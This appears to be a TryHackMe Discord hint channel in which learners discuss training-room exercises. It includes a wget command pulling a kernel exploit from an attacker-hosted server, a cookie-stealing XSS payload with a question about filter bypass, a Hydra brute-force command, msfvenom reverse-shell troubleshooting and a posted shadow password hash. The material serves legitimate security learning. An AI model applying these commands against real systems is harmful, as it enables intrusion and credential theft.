#room-hints

1 messages ยท Page 4 of 1

upbeat latch
#

I'm working on Network Services 2, Task 6, Enumerating SMTP, and I'm all the way to the end, running the Metasploit to get the username. I've looked up a walkthrough and it looks like my options are all set up to match theirs, but I'm not getting any usernames.

river ingot
upbeat latch
#

Oop, I did get an extra s in there.

river ingot
#

Yup!

upbeat latch
#

There we, go, got it. Thanks bud!

swift marsh
#

Doing [Severity 4] XML External Entity - Exploiting in OWASP Top 10 room.
I think I need RCE here, but it's using php function expect, I am not able to execute anything.
I would assume I need way to list directories in order to figure out where this could be, and use cat to read it.

Any hint ?

#

Ok, I figured it out, it appears that there is standard location in which SSH keys are stored.

rigid spade
#

I'm trying to find a file using this command but got nothing in the search. This is for Hacking with Powershell module.
Get-ChildItem -Path C:\ -Include *.txt -File -Recurse -ErrorAction SilentlyContinue | Select-String "interesting-file.txt"

white salmon
white salmon
#

I am currently doing Task 8(Challenge) from the room File Inclusion. I am kinda stuck on flag2. Got the Admin Cookie, but I am unable to get the output from /etc/flag2. or to be more clear: I am unable to get output from any file kekw feels like I tried everything I've just learned..trying it with ```
POST /challenges/chall2.php?file=......

the only thing I can imagine now is, that the "file=" part is wrong. but how tf do I find out what the parameter name is(in this case)?
white salmon
white salmon
#

got the flag. had nothing to do with the parameter name

#

holy cow

#

god bless my holy cigarette.. it gave me so many good answers in the past KEKW

#

i am so dumb btw

stuck galleon
#

Nevermind, just solved it

polar gazelle
#

Hey

#

I am stuck at intro to digital forensics task 3 4 ques.

woeful crag
#

aren't there only 3 questions? What's the problem @polar gazelle

polar gazelle
#

Yeah i mean at last ques.

#

I can't find camera model

lucid junco
#

exiftool | grep "camera" ?

polar gazelle
#

Does straight line bar denote something special?

#

Well its not working

lucid junco
#

Sorry, I forgot to specify the file.

polar gazelle
#

Yes

lucid junco
#

exiftool *filename* | grep camera

polar gazelle
#

I am in directory

woeful crag
#

just checked it, it is inside the metadata of the picture

lucid junco
woeful crag
#

๐Ÿ˜‰ but he could run exiftool on the pdf and doc also

polar gazelle
#

I am running on jpg file

lucid junco
#

Can you paste which command you're doing?

#

Or verify and paste a screenshott

#

!docs verify

proud scarabBOT
polar gazelle
#

Bro I can't very

#

Once i verified back bit now its not working

woeful crag
#

well do you get any output of the jpg? Use the command @lucid junco mentioned and you should be fine.

#

There is quite a lot of output but look though it thoroughly or use the grep command

polar gazelle
#

I make it

#

Thankyou guys

astral condor
#

i got ftp, i did ls -al and i found .flag. cd doesn't work and neither does cat. what should i do. echo?

astral condor
#

hackers

pine dust
#

Have you tried downloading it on your machine using get filename ?

astral condor
#

no

#

thx

#

!

pine dust
astral condor
#

hackers

#

linux machine

pine dust
#

can you share the link ?

astral condor
#

/koth/61011

pine dust
#

ok

astral condor
#

/games/koth/61011

dusty urchin
#

Madeye's Castle

hard axle
#

I'm not sure if the THM servers dropping as I finished the module saved my progress so whilst it was still in my clipboard.

Metasploit Exploitation Task 6: Msfvenom

"What is the other user's password hash?" || $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:1002:1002:||

left thunder
hard axle
#

It what way?

left thunder
# hard axle It what way?

Check how the /etc/passwd and /etc/shadow files are formatted and compare it to what you posted as the password hash in the spoiler

hard axle
#

Let me check I got the right task etc hopefully servers are back up

sage cloak
#

hello

#

im watching a video about it but...... yeah i still don't get it ]

bleak scarab
#

Hello people! Hope everyone is doing good

I need help for "Pyramid of Pain", task 5. I identified the malicious IP in question 1 but nothing malicious appears when testing it with the tools VirusTotal or OPSWAT

Thanks in advance to whoever will help ๐Ÿ™‚

edit: found answer in another room but thanks!

hard axle
#

Metersploit: Meterpreter

Task 5

The questions want me to open a .txt file for various answer but everything I have tried to open and read that file i just get "stdapi_fs_stat: Operation failed: The system cannot find the file specified."

I've located the file at "C:\Programe Files (x86)\Windows Multimedia Platform\secrets.txt"

Initially I tried cat command, no luck same message

The tried escaping the current directory "c:\windows\system32", I went down to root but i can not even cd to above location?

I tried to above with double \ and //

I have managed to move only really "../" around

I have tried download and get the same message

What am i missing this should be a simple cat command (as hinted by the questions)?

Update: I did some googling and the solution was
|| cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"||

However I tried that a few times and got the same message so I summise the servers where having issue again due to Cyber Advent.

lost schooner
#

Thank you!

green minnowBOT
#

Gave +1 Rep to @alpine kestrel

limber dawn
alpine kestrel
limber dawn
alpine kestrel
#

if you really wanna learn this outside of quotient there is the windows priv esc room

limber dawn
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

upper mulch
#

I have a question about task 4

#
#

I found the key but it says incorrect

#

can anyone help me ?

patent mirage
#

I am in Phishing emails in action task 3 q1. can someone help me to answer it
I have tried Cyber Chef But doesn't work

rustic sphinx
#

@unborn nebula do you know what command is used to list a directorys contents?

rustic sphinx
#

yup

#

so run ls on the folders (directorys)

unborn nebula
#

already don

unborn nebula
rustic sphinx
unborn nebula
#

Because only this folder contains files

rustic sphinx
#

its folder1, folder2, folder3, folder4

#

are you sure your in the documents* directory?

#

run pwd

unborn nebula
deep crystal
#

Hey, I am doing the "[Day 5] Brute-Forcing He knows when you're awake". I found the password, but when I try to connect via VNC, the Remmina window just stays black after entering the pw I found before. Am I not waiting long enough? ๐Ÿ˜ฎ

EDIT: it worked. Just took like 10 minutes to connect via VNC for some reason.

bleak yarrow
#

so am on a room called wekor i got initial foothold as WWW-DATA and i can't seem to find a way to Change to another user any hints

#

hmmmmmmmmmmmmmmmmmmmm

white salmon
#

I do know that if you type in "How to change users in Linux" you will immediately find your answer. Might need to do some scrolling maybe

#

It's a very simple command ^

bleak yarrow
white salmon
#

Do you know the command to change users ?

bleak yarrow
#

ik simple command but i found 2 passwords no one seems to work yeah su username

#

hmmmmmm

white salmon
#

okay yea it would be su <username>

bleak yarrow
#

Orka lool

#

nn the problem with the passwords not working

#

i red previous messages they say the room changed

#

i feel week n stupid

white salmon
#

Should give you your answer

#

Scroll down till you see this part

white salmon
bleak yarrow
dim sparrow
#

Hello I am in SQLMAP room
Sqlmap challenge (task 3)
Question 2.
Who is the current dB user?
I have dumped the database and can see its Nare/nare but question Is showing as incorrect ๐Ÿค”
Plz advise

left thunder
dim sparrow
patent mirage
#

when I Bake the URL it shows the same URL and just a simple different is http become hxxp. and that doesn't help me to answer the question

woeful crag
left thunder
unborn nebula
#

does any file exist called access.log in attack box

alpine kestrel
#

you are then meant to check it on the target machine which you ssh into from the attackbox

alpine kestrel
#

secure shell

#

linux fundamentals 2 goes through how to connect to that and use it

unborn nebula
alpine kestrel
unborn nebula
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

linux fundamentals one opens in split view but it is not the attackbox but a target machine in split view... not a lot of rooms are like that but some are

alpine kestrel
# unborn nebula ok thanks

if you can't find the flag in the access.log file there should be another file in the same dir with a very similar name that shadow can't recall right now that has the flag

#

unless that got fixed but doubt it

unborn nebula
alpine kestrel
#

not really

unborn nebula
unborn nebula
alpine kestrel
#

never mind that bug has been fixed

#

it is in your tryhackme users home dir

barren cloak
#

Hello, need a little hint if I could get one.

In Introduction to LAN and the last question in Task 2 A Primer on Subnetting: What is the name used to identify the device responsible for sending data to another network?

The answer field has the * formatted as ******* ******* (7 space 7).

I thought the answer was going to be network routers but it's not the answer.

I'm not sure what it's looking for now. Am I close? There is no hint button on this one so not sure what it's looking for now...

Any hint would be appreciated...

Nevermind... found it...

wanton elk
#

d** g**

#

lol nm

clear fiber
#

hi guys, im trying to complete this task on THM, "What is the content of user.txt ##This task is optional. You will use penetration testing techniques to gain access to this device."

i used sudo find / -type d -name "user.txt"

the result shows '/run/user/123/gvfs': Permission denied

how do i proceed from here?

serene badger
#

Id say you need escalated privileges to acces that file, search for a way to get that

#

There are alot of privilege escalation cheatsheets and info available

clear fiber
#

im in a root accountt

#

i'll try to figure

serene badger
#

Oh

#

Then just try to cd into the directory

#

As root should just work

clear fiber
#

it's a /bin/false user

#

i changed it and accessed it, but i cant find the user.txt file inside the account

#

not sure what i did wrong

serene badger
#

Also to filter out permission denied requests of find, use /dev/null clears the input alot

#

Try type -f instead of -d maybe

#

Believe you are now searching for directories

clear fiber
#

shows the same directory

#

same results

serene badger
#

Which room is this?

clear fiber
#

its a lab for my univerty

#

university*

serene badger
#

Homework or?

clear fiber
#

nah, its a optional thing

#

hacking is interesting, i need to figure this out

serene badger
#

Are you sure it is the right dir?

#

Maybe try a .txt search or try grep to make sure

clear fiber
#

ok

serene badger
clear fiber
#

ok thank you D=

serene badger
#

No worries

#

Best of luck

thorn lily
#

Hello

faint pumice
#

yo

grizzled valve
#

Hey all ๐Ÿ™‚ I want some help with Hydra. I used dirbuser and found a dir that needs basic authentication. I have the username, but my Hyndra query doesn't work and I'm not sure how to move on. I cant see from the webpage how my query should be either.

woeful crag
#

it should include http-get

grizzled valve
pine dust
woeful crag
#

hm it seems I'm mixing things up o.O

#

@grizzled valve what task is it an how does the login look?

#

sorry for the confusion^^

grizzled valve
woeful crag
#

do you get any errors?

pine dust
grizzled valve
#

@woeful crag The room is ToolsRus. Basic http auth. Post-form is giving me 16 valid passwords.

@pine dust Hmm, I'm not sure I'm following. Example? ๐Ÿ™‚

grizzled valve
serene badger
woeful crag
#

the endpoint should be ยดprotectedยด if I remember correct

pine dust
#

I haven't solved the room so i cant help you here but my best guess is that you are mentioning the endpoint incorrectly and since @woeful crag is saying the same, that must be it.

grizzled valve
woeful crag
#

http-post-form "/endpoint:data:check for string"

#

that should be the ending structure

grizzled valve
#

Not completly sure I get it, but I'll try ๐Ÿ˜› Thanks both of you for the help

craggy ember
#
https://tryhackme.com/room/walkinganapplication
TASK -- 3
QUESTION NUMBER -- 3 

I am not able to get this one...
Where should I take guidance regarding it ?

woeful crag
craggy ember
woeful crag
woeful crag
left thunder
#

Using dirbuster is already beyond the scope of that room/task.
You can just inspect the source code, you can see various files that getting included, in the path you can see the name of the directory that is holding these assets.

These directories shouldn't be accessible directly, but maybe you can ๐Ÿ™‚

white salmon
#

Room Splunk 2, last question with scheduled tasks
I found some ||encoded stuff that leads to IP and a URI path||, but it is shorter than the answer

nvm

drowsy zinc
#

stuck on Linux Privilege Escalationz task 5, question 1. i can't seem to wget the kernel exploit needed from the hosted web server. the command i am using on the target machine is wget http://10.10.222.148:9001/root/Desktop/ofs.c and im receiving an http 404 file not found message, when i can clearly see the file on the desktop of the host machine

#

the cve in question is CVE-2015-1328 if that helps as well

#

nvm i figured it out by creating the same file with the kernel exploit in the /var/tmp directory of the target machine

woeful crag
#

@drowsy zinc you gave wget the absolute path of the ofc.c file, that is why you received a 404. if you start the webserver from the Desktop then it would be http://10.10.222.148:9001/ofs.c

late walrus
#

can I get a hint with Zeek Task 5

drowsy zinc
woeful crag
#

in this particular exampe / == /home/username/Desktop (assuming you started it there)

drowsy zinc
#

since that would be a valid path to the Desktop directory from the root directory?

woeful crag
#

correct but you would made literally everything available

drowsy zinc
#

true but if im the only one wgetting things from said server...๐Ÿคทโ€โ™‚๏ธ

umbral umbra
drowsy zinc
#

losferatos did a great job explaining it tbh

earnest wave
#

Ohsint where to find his password? I dont want to google it cuz that would possibly reveal too much

ivory meadow
#

have you find his blog?

earnest wave
#

ye

#

also github and twitter

ivory meadow
#

somewhere in the blog i could say

earnest wave
#

thanks tho

ivory meadow
#

yeah look into it

earnest wave
tame jackal
#

Hello guys, im trying to generate a reverse shell with msfvenom in aspx format but for some reason the x64 architecture is incompatible with the payload. Tried to generate it with no architecture but when executing it don't give me a shell, guess it needs to be x64 bc the machine is running on windows server 2016, any help is appreciate it

haughty vault
#

Is there any reason you need the x64 or you can use x32 ?

tame jackal
#

I didn't try x32, but the server is on windows server 2016, I did a bit of research and i found its build in x64-x86, i tried x86 and it didn't give me the shell tho

#

Can't understand why x64 is incompatible with the payload

arctic sage
#

Hello, its a bit off topic but I was wondering if anyone could give me some hints about a CTF I've been trying to do. Its not from THM or any similar websites so there's not a walkthrough I can find and follow. If anyone's happy for me to PM them let me know please ๐Ÿ‘

topaz umbra
brave sentinel
#

how to extract data from a .wav file??

wanton elk
#

binwalk, stego, etc - what room/task?

arctic sage
green minnowBOT
#

Gave +1 Rep to @topaz umbra

white salmon
#

Hey, have a question about Splunk101, trying to input the last 2 questions, and I'm not understanding what answers it wants. I did the exception !="France" and got the value, and also with the VPN events for a particular IP.

#

It doesn't like either answer I put, so i'm puzzled what the answers might be.

#

Actually figured it out. I am a moron ๐Ÿ™‚

#

I closed out of splunk, reopened it, re-uploaded the .json file, so I had 2x the event logs.

brave sentinel
#

@wanton elk psychobreak

hard axle
#

Linux Privilege Escalation Task 5

I found this task to not really have told you before hand how to use the exploit.

This link helped me figure out how to execute/run the exploit.

|| https://www.youtube.com/watch?v=aQfShUs6TGA||

charred plover
#

linuxprivesc room 2nd question "run the id cmd, what is the result" - pasting the result in isnt right ๐Ÿค” but googling for it yields a different result in someone's walk through and that is deemed correct...

#

the result I got includes entries for ...27(sudo),109(netdev),119(wireshark)... and some others...

#

hahaha

#

nvm

#

damn every stinkin time

#

im an idiot. please ignore.

brave sentinel
#

how do i compile an exploit when there is no gcc available on the vuln machine?

woeful crag
alpine kestrel
umbral umbra
wanton elk
#

try static compilation with -o

distant mesa
#

need a lil clarification....exinfo gave me different coordinates as comapared to the (HINT) answer in a room....

#

task3 - QUESTION 2 -- Using exiftool or any similar tool, try to find where the kidnappers took the image they attached to their document. What is the name of the street?

lucid junco
distant mesa
lucid junco
distant mesa
lucid junco
distant mesa
#

sure...these are what I got 51ยฐ 30' 8.650507"N

0ยฐ 5' 6.455754" W

distant mesa
lucid junco
#

You get the cord ||51 deg 30' 51.90" N, 0 deg 5' 38.73" W||

But you need to change the DEG to ยฐ and combine them.

||51ยฐ30' 51.90" N, 0ยฐ5' 38.73" W||

#

So 5 deg 3 = 5ยฐ3

distant mesa
#

oh..i got the wrong cordinates?

distant mesa
#

my bad....

distant mesa
#

what do you think? @lucid junco

lucid junco
#

I'm not sure.

I downloaded it on my vm and used exiftool.

unborn nebula
#

couldn't find the answer?

hexed crescent
unborn nebula
green minnowBOT
#

Gave +1 Rep to @hexed crescent

limpid lintel
#

im doing basic pentesting room right now ... so do i have to || brute force ssh || or does it have something to do with || apache tomcat || ?

white quartz
#

I am doing brainpan1 right now, i am a bit confused as my ||shellcode is stored after eip and is located at esp+8bytes or eip+4bytes||, is there any way, i can overwrite eip with jmp [||ESP||+8]? I think I would need to translate this to opcode right? Btw. the architecture is x86 and i am debugging with wine on linux and do not have the immunity debugger.

tacit creek
#

Hi there, any hints on Crypted room? Ive found one user and password, but not the one i need, got dbase backup with "destroyed" files, and info how db was encrypted. Cracking another users password but i think im looking in a wrong direction...

crude pendant
#

Hello, im doing the room "Buffer Overflows" https://tryhackme.com/room/bof1 (Task 7 - Overwriting Function Pointers) and I have the following question regarding Task 8:

I was able to identify the structure of the code in the memory:

400567
............... special
400581
400582
............... normal
400592
400593
............... other
4005a8
4005a9
............... main
4005a2

The buffe is 14 bytes long.

Everything inside this range will bring me to the normal execution.
Our goal is to provoke an overflow that brings us to special and then other.
so [14] + *Something

The question is:
Why writing the ASCI of the first address of [special or other] brings us to there? I could find a correlation to this characters and going to this specific address:
0000400567 (big endian)
6705400000 (little endian) ==> ASCII== *Something

*something = this word is a spoiler of the answer, for those who have done the room will understand what it means, for the others, it is better to try the room first.

steel flume
#

Any one available to give me a nudge on year-of-the-fox

ivory meadow
wild creek
#

Hey anyone online I need help for Psycho break room

lucid junco
wild creek
#

okay

#

here waiting for reverse shell

#

10.17.14.47 is my IP

#

listening on 4444 on nc

#

nothing reflecting in /home/kidman/.the_eye.txt also which I have modified to be written

wanton elk
#

Did you test it by running the script manually?

languid isle
#

and just overwrite the file if u able to write into it anyway

#

no need to append

wild creek
#

yeah import socket was missing i fixed it but still not working

#

no issue basically understood the concept no need to stuck here now

river valley
#

Hi,
for Nmap practical, i have done the ICMP thing as taught. what am i doing wrong here

#

It's suppose to be N but mine is up

ivory meadow
#

That's not ICMP pinging

#

Can you try "ping" command instead?

umbral umbra
river valley
open kelp
#

Hi everyone! I'm in Phishing Emails1 Task 5, trying to decode an email. I took out the header, then stuck it in Cyber Chef, from Base 64. I'm still getting jibberish. I've checked a few walkthrough's for a hint, but that's all they do and it works for them. Is there another step I'm missing?

unborn moon
#

!docs verify

proud scarabBOT
tidal wyvern
#

hi i'm in vulnet room

#

i cldn't find the machine IP so not sure who to start this room

lucid junco
#

I think the VM was removed,

Probably best sticking it in #room-bugs

tidal wyvern
#

thanks

unkempt umbra
#

Hello guys i hope all doing good i am in encryption room as part of crypto101 i got a question that is okey to share your public key the response is yes but what if the data was encrypted by a public not a private one ?

unborn moon
#

So to answer your question, in order to encrypt a message for someone, you need to have their public key, hence why it's called a "public" key. The private key is only used for decryption.

tidal wyvern
#

hi i'm at holo room again

#

i kept getting hosts down, not sure why

unkempt umbra
green minnowBOT
#

Gave +1 Rep to @unborn moon

acoustic cobalt
#

hello i need help

#

intro to defensive security task 3

#

@proven bridge

ivory meadow
#

Please be patient and don't ping him, It's just rude. If you wait, there are volunteer people to help you

ivory meadow
#

Which section did you get stuck on?

acoustic cobalt
#

sorry fro late reply

ivory meadow
#

But which part of it?

acoustic cobalt
#

i m gonna dm

ivory meadow
#

Wait, C'mon.. Read my bio

acoustic cobalt
alpine kestrel
#

!docs verify

proud scarabBOT
alpine kestrel
#

if you wanna post screenshots

acoustic cobalt
#

thanks

#

but nvm i have solved ot myselfcoolguy

ivory meadow
#

You need to open Split View screen from the top-right

lost schooner
topaz barn
#

hey guys

#

I am doing Theseus and I am at the ||last part of it. I have ariadne's password on Labyrinth.lxd. How do I reach Athens.lxd. Only SSH seems to be open||

#

can anyone give me a nudge?

trim haven
#

No hints for the Theseus box

lean locust
#

Hi, I am doing the yara room by cmnatic and sucessfully used yargen. When I run yara/loki on the suspicious file2, yara just prints the file path. Loki doesn't detect anything (still saying it's clean), even though the file2.yar is in the signature-base directory. So I can't continue :/

Any idea how to fix this? The generated file has all the strings and I could even answer the task 9 just by checking the generated file.

alpine kestrel
earnest wave
#

I am doing task 10 in the john room and I cannot run rar2john without using a workaround by being in it's folder and using './'. Anyone know why is that the case or how to fix it?

left thunder
#

Or move rar2john to a directory that is in the PATH variable

earnest wave
left thunder
earnest wave
#

Top and bottom

left thunder
earnest wave
left thunder
earnest wave
#

I don't think I understand your question

left thunder
#

If you do pwd inside that directory, it's giving you the path

earnest wave
#

Oh

#

I'm in 2 different terminal windows btw

left thunder
# earnest wave

Okay, well then there you have it, there is another zip2john in /usr/local/bin while there is no rar2john there

earnest wave
#

Is that how it's supposed to be or is that some kind of oversight in the attackbox?

earnest wave
#

Well the room does not mention it so it seems like an oversight.

#

Thanks tho

alpine kestrel
#

find command to the rescue

gritty fjord
#

!docs Verify

proud scarabBOT
#
TryHackMe
That topic does not exist!

Use !docs to list all of the available topics.

gritty fjord
#

!docs

proud scarabBOT
#
TryHackMe
Here are all of the possible topics!
!docs url

Visit the help site

!docs verify

Learn how to sync your THM profile to Discord

!docs student

Learn about our student discount programme

!docs levels

View all the TryHackMe levels & point requirements

!docs room-notes

Get started with making TryHackMe room

!docs room-review

Learn about the TryHackMe room review process

!docs api

Read about the TryHackMe API

!docs koth

How to play TryHackMe's King of the Hill (KoTH)

!docs free-path

What rooms should you do? A free guide for beginners

!docs bug-bounty

Learn about TryHackMe's Bug Bounty Programme!

gritty fjord
#

!docs verify

proud scarabBOT
woeful crag
#

!docs api

proud scarabBOT
#
TryHackMe
That topic does not exist!

Use !docs to list all of the available topics.

gritty fjord
#

!docs koth

proud scarabBOT
proud tapir
#

!docs free-path

proud scarabBOT
limpid lintel
#

im doing basic pentesting room and i got || ssh private and public key files of kay and i have already changed the permission to 600 || and when i connect to kay with that file, i got asked || to provide passphrase || ... so im thinking this || DEK-INFO || might have something to do with passphrase ... any hints?

woeful crag
limpid lintel
#

need help ... doing pickle rick CTF and im stuck at || /assets URL with images|| and i tried to || extract metadata from images by using exiftool and xxd to see any hidden messages || but didnt work ... any hints?

cold eagle
limpid lintel
#

Yep already found || username || and robots.txt but i dont get the text inside robots.txt

drifting vault
#

can anyone assist me in vendetta tast1?

drifting vault
limpid lintel
limpid lintel
lucid junco
lean locust
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

ionic minnow
#

anybody advise me with nmap pracrical?

#

practical*

#

i don't understand "Does the target (MACHINE_IP)respond to ICMP (ping) requests (Y/N)?" what is the target IP address??

#

who is the target?

dapper fern
#

Are you in the Nmap tutorial

ionic minnow
#

I see my attackbox IP address but I have no idea who the target it is

#

yes I am

dapper fern
#

Give I second I have to logon

ionic minnow
#

Also I cannot use Sudo on the attackbox machine

ionic minnow
#

thanks for help in advance

unborn moon
# ionic minnow Also I cannot use Sudo on the attackbox machine

On the Attackbox you should be the root user, so no need for sudo. And for your other question, there is probably another VM you need to start, it should be attached to the task and can be started with the green "start machine button". Once booted, you can view the IP at the top of the room, underneat the score chart

dapper fern
unborn moon
ionic minnow
#

i'm back

#

i deploy the machine and I get my own kali machine with attackbox and IP

#

but there is no option to open another machine nor can I find reference to a hosts IP Address or network

#

Use what you've learnt to scan the target machine and answer the following questions! Question is which target machine? its really not clear at all

#

I have opened a full browser based machine window, so I now know the root password as it states it on the page before the browser opens... You would never know unless you open a machine in it's own window

dapper fern
dapper fern
ionic minnow
#

no

dapper fern
#

ok you should see a blue button at the top of the Nmap module the blue button is the attack box

ionic minnow
dapper fern
#

on Task 1 there is a green button that says Start Machine this is the machine you are attacking

#

when you click the blue button a linux machine opens when you click the green button it gives you an IP address of the machine you are attacking

#

If you need more help DM me

#

I finished this entire module

ionic minnow
#

the green button states the following?

#

You are connected via AttackBox

Your machines IP is 10.10.220.84

To access target machines you need to either:

AttackBox
Use a browser-based attack machine

dapper fern
#

send a screen shot

#

Can you take a snippet

ionic minnow
unborn moon
#

I think you're clicking on this one, which is your Attackboxes IP

dapper fern
unborn moon
dapper fern
#

still working I believe he got both machines working

unborn moon
green minnowBOT
#

Gave +1 Rep to @dapper fern

dapper fern
#

Am I in trouble with Robocop

dapper fern
unborn moon
dapper fern
#

He is almost done with that module

young orchid
#

I'm kinda stuck on tokyoghoul666
Task 4 step 3/4.

Not sure how to ask a question without spoiling, but I found the hidden directory with the ****/index.php page in.
it looks like I'm supposed to see another gif when I click the menu, nothing loads though.

Any hint?

lucid junco
young orchid
lucid junco
lucid junco
young orchid
#

Ohhh thanks!
I don't have the solution yet, but I do know how to continue investigating

#

Thanks!

quick holly
#

Can I get a hint on "safezone"?

#

I'm stuck on the privesc

#

I've got the files user, but I don't know what to do

#

I haven't found any id vulnerabilities

#

Nothing in the SQL database either

junior wave
quick holly
#

The only one was the snap directory, but there wasn't anything useful there

#

I did notice /opt had the yash-group though

junior wave
quick holly
#

There was an internal webpage on port 8000

#

Thanks for your time though

covert badge
#

Not sure the answer they are wanting and how its formatted can anyone help? It's in the windows fundamentals 1 section of pre-security

  1. Which selection will hide/disable the Task View button?

2.Besides Clock and Network, what other icon is visible in the Notification Area?

sleek nebula
#

need help with the the intro to offensive hacking

mossy ruin
lucid junco
magic lava
#

Hi, I am in MAL: Malware Introductory task 9 and I can't find Bin file when I open PEiD. Can someone help me ?

royal frost
#

Hello all....I'm having trouble with a Task 2 question in the Wireshark: Traffic Analysis room. The question: Which UDP port in the 55-70 port range is open? I don't want the answer but rather a better hint at how to find this. I've answered the other questions. I can find the UDP traffic but having issues with the appropriate filter for port ranges. Thanks a million

quick holly
#

Also, you can use things like == >= <= for ranges

#

I'd also like some help myself, I'm stuck trying to get the foothold on the vulnnet box, but I've tried basically everything and no dice

#

The only thing I've found is the ||broadcast subdomain||.

ionic hatch
#

Hi all. Red team recon room - Q6 - seems like something is off with the name of the author of the "Censys email address" module for Recon-NG - someone figured it out..something with a typo in the name (apparently). ive browsed through the revisions of the actual module file containing the author field, but theres no real hints there. anyone? ๐Ÿ™‚

ivory meadow
ionic hatch
green minnowBOT
#

Gave +1 Rep to @ivory meadow

proper laurel
#

Hello all ... i am a beginner and currently trying to solve Lazyadmin room, i proceeded by scanning with nmap and found a ssh open port, i am trying to log in to the port but don't know how to get the password for it . Can someone nudge me in the right direction ?

alpine kestrel
#

do more enumeration of other services and maybe you will figure out how to get into ssh

gaunt edge
#

Hello, working on a john the ripper room and had a bit of trouble with cracking a hash containg a salt ๐Ÿ™‚

heady geode
#

Im doing a CTF XSS challenge.

I want to grab the cookies. Trying to craft <script>alert(document.cookie)</script> in the web URL
But Im getting the error Forbidden input(`,',",/,string) Ive tried encoding this with URL/HTML etc but still no luck.
Basically the one char that I have to encode is "/" but cant find any alternatives.

Any suggestions?

Please tag me if you reply.

quick holly
gaunt edge
green minnowBOT
#

Gave +1 Rep to @quick holly

quick holly
#

Anytime :)

inner barn
#

Hi, trying to solve CCT2019 Task 1 - anyone who can help out? We got to extracting ||the binary from the pcap TCP stream that follows the ICMP chat, but the hash does not match the md5 hash in the chat. This leads us to believe its probably encrypted. We then tried decrypting the file using cryptcat and the password from the "The Net" movie reference, but this did not succeed either. || We're a bit stuck trying to extract this payload. Anyone who got further?

covert kestrel
#

Hey i m in room -Principles of Security and stuck on task 4 don't know how to write it down can anyone help?

#

its showing me to write it in this formatting: The x Model Look at the direction of the arrows and the text next to them to understand what directions can read up/down depending upon the model

#

thtis is how i have done it

#

The Bell-La Padula Model Look at the direction of the arrows and the text next to them to understand what directions can read up and not down

river valley
#

How can I download files on my attackbox

#

Or is it safe to sign in the THM on the attackbox

#

??

ivory meadow
#

Oh, I don't think it's a problem

#

However keep in mind everything you need for room should be inside of the attackbox.

river valley
#

I was doing the John the ripper room and couldnโ€™t download the hash files

ivory meadow
#

You can also download it on your host PC and copy inside of the txt file and then create new file in attackbox with the copied hash

river valley
#

I appreciate anyway

ivory meadow
lucid junco
#

Attackboxes are public facing on the internet.

#

They're not hidden behind your NAT.

river valley
#

So how do I download files on my attackbox for task

lucid junco
river valley
lucid junco
# river valley I canโ€™t seem to locate it

I'm booting up an attackbox, but as it's an older room the materials may have been removed from the VM.

It might be worthwhile asking @steady stratus if he can add them, but I've not seen Ben around recently, so I don't know how busy they are.

peak grotto
#

Hi i am having an issue with the complete beginner course, i completed the intro to cyber security course before the beginner one on accident. In the intro to linux room I cannot follow along with it because I am signed into the root account not the tryhackme@linux1 like it shows in the room. can anyone help me with this, i am new i hope this made sense lol. thanks!

ivory meadow
peak grotto
#

i believe it was the attackbox

ivory meadow
#

Can you try one attached in the room?

lucid junco
peak grotto
ivory meadow
#

It's an in-browser machine that you can interact

peak grotto
#

that worked thank you! i didn't realize they were different.

worldly flare
#

Hey guys, im doing Pickle Rick

#

and im trying to find a way to exploit the web server

#

i stuck on the 1. part as i dont know what vuln to use

#

/start using

peak grotto
#

if someone is able could i have help in the vc so i can share my screen? i dont understand what is going wrong

ivory meadow
tardy notch
#

Hello Guys !

Hope you are all well,
Im doing the Anthem box and im stuck at the 4 questions

tardy notch
ivory meadow
#

rockyou.txt is for password bruteforcing

tardy notch
#

hydra + rockyou.txt

left thunder
tardy notch
#

mmmh

left thunder
# tardy notch mmmh

It's a very basic file, which nearly every webpage has.
Just google for "file to tell webcrawler what to crawl"

tardy notch
#

ok thank I'll do it rn

#

robots.txt ?

left thunder
tardy notch
#

i requested it on the target

#

I found it

#

again stuck

ivory meadow
#

where?

tardy notch
#

I found it

ivory meadow
#

mk

peak grotto
green minnowBOT
#

Gave +1 Rep to @left thunder

wooden shuttle
#

Hi. Could someone please give me a hint on Password attacks task 8, question 4? I have been working on this for an hour and haven't had any luck. I am using this command: hydra -l phillips -P newlist.txt 10.10.95.33 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed" -v. I tried using crunch to generate a 1 though 5 character wordlist.

left thunder
summer bronze
#

Hello folks,
Im solving the Secret Recipe room.
And im stuck in the question of everything.exe. and the number of seconds Proton VPN was in focus.
Can someone nudge me in the right direction with some hints.

wooden shuttle
green minnowBOT
#

Gave +1 Rep to @left thunder

left thunder
wooden shuttle
#

Thanks. I solved both.

pure mica
#

Hello just looking for some tip; i'm doing the Basic malware RE room. Now it says don't open debugger and don't execute the code to know the answer. Well when I call my 'strings' function on those files, it just doesn't do anything.. Can someone put me in the right direction?

dusky iris
pure mica
#

Ooh right i did that room! Thanks

azure osprey
indigo merlin
#

resolve dns for the link breachad. i think u wont be able to see breachad in your GUI. try resolvectl. note that in the walkthrough, in the attack box, the command is systemd-resolve for the link breachad. i believe systemd-resolve is phased out if im not wrong

left thunder
pure mica
#

Having issues with the burp suite basics room. Task 13, i'm looking around at my target but can't seem to find the url with the flag in it. I adjusted my scope to only take trafic from my target

left thunder
#

!docs verify

proud scarabBOT
white stag
#

Hi guys I canโ€™t use search sploit script Because I have an error inside the script but itโ€™s correct
(Print error)

#

Iโ€™m inside โ€œsimple ctfโ€ room

ivory meadow
#

If the script is python, can you try python2 instead?

white stag
ivory meadow
white stag
#

One moment ..Iโ€™m coming home ๐Ÿ˜…

#

Thatโ€™s the same error

unborn moon
white stag
#

Thanks ๐Ÿ‘๐Ÿป

unborn moon
# white stag

If you get the parentheses error for the print function, it means you are using python3 in your command, but your script has python2 syntax (feel free to correct me if I'm wrong)

white stag
#

Ahh ok ๐Ÿ˜ฏ๐Ÿ‘๐Ÿป

#

Thanks โ˜บ๏ธ

lavish quarry
#

could someone please give a hint as to what to do/look for [Network services - complete beginner path ] this question?
Based on the title returned to us, what do we think this port could be used for? Task 6

white salmon
ivory meadow
pure mica
peak tinsel
pure mica
peak tinsel
#

yep: the proxy intercepts every request before it is loaded, so once you request the page you need to forward the request to the browser for it to load.

lunar onyx
#

